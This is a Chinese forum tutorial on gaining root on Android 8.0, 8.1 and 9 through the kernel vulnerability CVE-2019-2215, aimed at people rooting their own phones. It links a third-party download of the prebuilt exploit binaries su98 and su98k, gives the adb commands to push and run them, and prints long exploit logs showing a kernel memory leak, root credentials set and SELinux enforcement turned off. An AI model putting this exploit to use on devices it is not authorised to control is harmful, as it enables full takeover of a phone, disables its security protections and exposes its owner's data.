【教程】安卓8.0，8.1，9.0版本内核漏洞获取root

root 方法 CVE-2019-2215是一种Android系统内核漏洞，影响Android 8.0、8.1和9.0版本。具体来说，以下安卓版本受到该漏洞的影响： Android 8.0 Android 8.1 Android 9 按道理来说这个漏洞在安卓8,9都可以用,理论来说可以无视BL锁,基于漏洞提权root,但这个root临时的,重启手机就会没,不过也可以进行一些越级的操作,也可以用来提取boot,刷面具进行加固,但前提是已经解BL锁,不然很容易变砖,当然也可能会存在个例机型不解锁刷也无所谓的， #【原创教程】免root使用手机给另一部手机刷面具# 文件包:https://wwrx.lanzoum.com/iPUEb138zhaf 具体方法： 1. 使用提权漏洞获得临时root权限：首先使用 adb 将 su98 和 su98k 两个可执行文件下载到设备上。请解压后，在当前目录打开终端或者 powershell（或者自行调整命令的路径，以下不再解释路径的问题），并执行： adb push ./su98 /data/local/tmp adb push ./su98k /data/local/tmp 然后我们需要授予可执行权限，使用 adb shell 进行的操作以>开头： adb shell > cd /data/local/tmp > chmod 775 * 授权后，先运行su98: > ./su98 以下是运行时的提示，可能不尽相同，运行结束后看见 # 符号便成功获得伪root R5:/data/local/tmp $ ./su98 MAIN: detected kernel version 3 MAIN: starting exploit for devices with waitqueue at 0x98 PARENT: soon will be calling WRITEV CHILD: Doing EPOLL_CTL_DEL. CHILD: Finished EPOLL_CTL_DEL. CHILD: initial portion length 0x12000 CHILD: task_struct_ptr = 0xffffffc032d93fc0 CHILD: clobbering with extra leak structures PARENT: clobbering at 0xffffffc0431202a0 CHILD: Doing EPOLL_CTL_DEL. CHILD: Finished EPOLL_CTL_DEL. PARENT: readv returns 69688, expected 69688 PARENT: clobbering test passed CHILD: clobbered PARENT: writev() returns 0x13008 PARENT: Reading leaked data CHILD: task_struct_ptr = 0xffffffc015d30000 CHILD: Finished write to FIFO. CHILD: wrote 69688 PARENT: leaking successful MAIN: thread_info should be in stack MAIN: parsing kernel stack to find thread_info PARENT: soon will be calling WRITEV CHILD: Doing EPOLL_CTL_DEL. CHILD: Finished EPOLL_CTL_DEL. CHILD: initial portion length 0x12000 CHILD: task_struct_ptr = 0xffffffc032d93fc0 CHILD: clobbering with extra leak structures PARENT: clobbering at 0xffffffc043120ea0 CHILD: Doing EPOLL_CTL_DEL. CHILD: Finished EPOLL_CTL_DEL. PARENT: readv returns 69688, expected 69688 PARENT: clobbering test passed CHILD: clobbered CHILD: extra leak PARENT: writev() returns 0x17008 PARENT: Reading leaked data CHILD: Finished write to FIFO. PARENT: Reading extra leaked data PARENT: leaking successful MAIN: task_struct_ptr = ffffffc032d93fc0 MAIN: thread_info_ptr = ffffffc015d30000 MAIN: Clobbering addr_limit PARENT: clobbering at 0xffffffc015d30008 CHILD: Doing EPOLL_CTL_DEL. CHILD: Finished EPOLL_CTL_DEL. CHILD: wrote 69648 PARENT: readv returns 69648, expected 69648 PARENT: clobbering test passed MAIN: thread_info = 0xffffffc015d30000 MAIN: should have stable kernel R/W now MAIN: searching for cred offset in task_struct MAIN: search_base = ffffffc000000000 MAIN: searching for selinux_enforcing MAIN: searching for kallsyms format strings MAIN: **partial failure** cannnot fix kallsyms format string MAIN: searching for kallsyms table MAIN: kallsyms names start at 0xffffffc000f5a900 and have 129536 entries MAIN: kallsyms names end at 0xffffffc001057900 MAIN: direct search didn't work, so searching via avc_denied MAIN: searching for kallsyms format strings MAIN: **partial failure** cannnot fix kallsyms format string MAIN: searching for kallsyms table MAIN: setting root credentials with cred offset 670 MAIN: UID = 0 MAIN: enabling capabilities MAIN: SECCOMP status 0 MAIN: **FAIL** did not find selinux_enforcing symbol MAIN: re-joining init mount namespace MAIN: rejoining init net namespace MAIN: root privileges ready MAIN: popping out root shell R5:/data/local/tmp # 此后我们在伪root环境下运行su98k以干掉selinux，实现完整的提权： > ./su98k 以下是运行后的提示： R5:/data/local/tmp # ./su98k MAIN: detected kernel version 3 MAIN: starting exploit for devices with waitqueue at 0x98 PARENT: soon will be calling WRITEV CHILD: Doing EPOLL_CTL_DEL. CHILD: Finished EPOLL_CTL_DEL. CHILD: initial portion length 0x12000 CHILD: task_struct_ptr = 0x0 PARENT: writev() returns 0x13008 PARENT: Reading leaked data CHILD: task_struct_ptr = 0x0 CHILD: Finished write to FIFO. CHILD: **fail** problematic address pointer, e.g., 0 MAIN: **fail** retrying PARENT: soon will be calling WRITEV CHILD: Doing EPOLL_CTL_DEL. CHILD: Finished EPOLL_CTL_DEL. CHILD: initial portion length 0x12000 CHILD: task_struct_ptr = 0xffffffc032d94c80 CHILD: clobbering with extra leak structures PARENT: clobbering at 0xffffffc0331d0ca0 CHILD: Doing EPOLL_CTL_DEL. CHILD: Finished EPOLL_CTL_DEL. PARENT: readv returns 69688, expected 69688 PARENT: clobbering test passed CHILD: clobbered PARENT: writev() returns 0x13008 PARENT: Reading leaked data CHILD: task_struct_ptr = 0xffffffc015cac000 CHILD: Finished write to FIFO. CHILD: wrote 69688 PARENT: leaking successful MAIN: took 1 tries but did it MAIN: task_struct_ptr = ffffffc032d94c80 MAIN: stack = ffffffc015cac000 MAIN: Clobbering addr_limit PARENT: clobbering at 0xffffffc015cac008 CHILD: Doing EPOLL_CTL_DEL. CHILD: Finished EPOLL_CTL_DEL. PARENT: readv returns 69648, expected 69648 PARENT: **fail** clobber value doesn't match: is 0 but should be abcddeadbeef1234 MAIN: **fail** retrying PARENT: clobbering at 0xffffffc015cac008 CHILD: wrote 69648 CHILD: Doing EPOLL_CTL_DEL. CHILD: Finished EPOLL_CTL_DEL. PARENT: readv returns 69648, expected 69648 PARENT: clobbering test passed MAIN: took 1 tries but did it MAIN: thread_info = 0xffffffc015cac000 MAIN: should have stable kernel R/W now MAIN: searching for cred offset in task_struct MAIN: search_base = ffffffc000000000 MAIN: searching for selinux_enforcing MAIN: searching for kallsyms table CHILD: wrote 69648 MAIN: kallsyms names start at 0xffffffc000f5a900 and have 129536 entries MAIN: kallsyms names end at 0xffffffc001057900 found symbol in kernel memory MAIN: setting root credentials with cred offset 670 MAIN: UID = 0 MAIN: enabling capabilities MAIN: SECCOMP status 0 MAIN: disabled selinux enforcing MAIN: root privileges ready MAIN: popping out root shell R5:/data/local/tmp # 此时我们获得了完整的root权限